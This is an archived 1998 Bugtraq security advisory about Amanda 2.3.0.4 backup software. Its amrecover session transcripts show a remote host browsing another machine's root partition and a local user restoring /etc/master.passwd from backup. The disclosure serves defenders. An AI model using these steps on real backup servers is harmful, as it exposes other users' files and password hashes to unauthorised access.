From gale@DARPANET.NET Sat Jan 10 16:39:17 1998
From: Gale Pedowitz <gale@DARPANET.NET>
X-Sender: gale@corinne.cpio.org
To: BUGTRAQ@NETSPACE.ORG
Date: Sat, 10 Jan 1998 11:01:43 -0800
Subject: CPIO-SN #11980105: Amanda v2.3.0.4 Backup Software

Cheers, all,

The notice that was sent out at 4AM today was released in error. This is
the actual release.

CPIO apologizes for the confusion.

--

        **************** CPIO Security Notice ****************
        Issue 11: 980105
        Topic: Amanda v2.3.0.4 Backup Software
        Platforms: Platform-independent
        ************** http://www.darpanet.net  **************

This release concerns vulnerabilities in the Amanda backup software
suite; remote users may exploit these vulnerabilities to view arbitrary
files on Amanda network backup clients.


SUMMARY

There are several security problems in the current version of Amanda.  The
vulnerabilities detailed here are two of many discovered by an OpenBSD
security audit. The Amanda core team has been contacted.

        I. Any attacker can connect remotely to an index server, thus
        permitting access to any machine being backed up.
        II. A malicious local user may access any partition or any files
        on a machine backed up through the network via Amanda.


EXAMPLE I:
index.servername.net | the affected index server
remote.attacker.org  | attacker's host
staff                | a machine being backed up by the index server

[remote%] amrecover -s index.servername.net
AMRECOVER Version 1.0. Contacting server on index.servername.net ...
220 index.servername.net AMANDA index server (1.0) ready.
Setting restore date to today (1997-12-24)
200 Working date set to 1997-12-24.
200 Config set to DailySet1.
501 No index records for host: remote.attacker.org. Invalid?
amrecover> sethost staff
200 Dump host set to staff.
amrecover> setdisk wd0a
200 Disk set to wd0a
amrecover> ls
[ list of root partion ]


EXAMPLE II:
users                | users shell machine being backed up
staff                | staff machine being backed up

[users%] amrecover
AMRECOVER Version 1.0. Contacting server on index.servername.net ...
220 index.servername.net AMANDA index server (1.0) ready.
Setting restore date to today (1997-12-24)
200 Working date set to 1997-12-24.
200 Config set to DailySet1.
200 Dump host set to users.
Divided $CWD into directory /joey on disk wd0f mounted at /home/home1.
200 Disk set to wd0f.
amrecover> setdisk wd0a
200 Disk set to wd0a
amrecover> cd etc
amrecover> add master.passwd
Added /etc/master.passwd
amrecover> extract
Extracting files using tape drive /dev/nrst0 on host index.servername.net.
The following tapes are needed: DAILY6
Restoring files into directory /home/home1/joey
Continue? [Y/n]: y
Load tape DAILY6 now
Continue? [Y/n]: y
amrecover> quit
[local%] pwd
/home/home1/joey
[local%] ls master.passwd
master.passwd


AFFECTED PLATFORMS AND NOTES

This vulnerability is related to problems in the software itself, and
appears to be platform-independent. Known (tested) afflicted platforms
include OpenBSD and Linux.


FIXES

A patch from the authors is forthcoming. The only known workaround at this
time is to completely disable Amanda.


CREDITS

This vulnerability was discovered and described by Joey Novell
<joey@cpio.org>. Gale Pedowitz <gale@cpio.org> edited and prepared
this release. Other contributors include Jonathan Katz <jkatz@cpio.org>.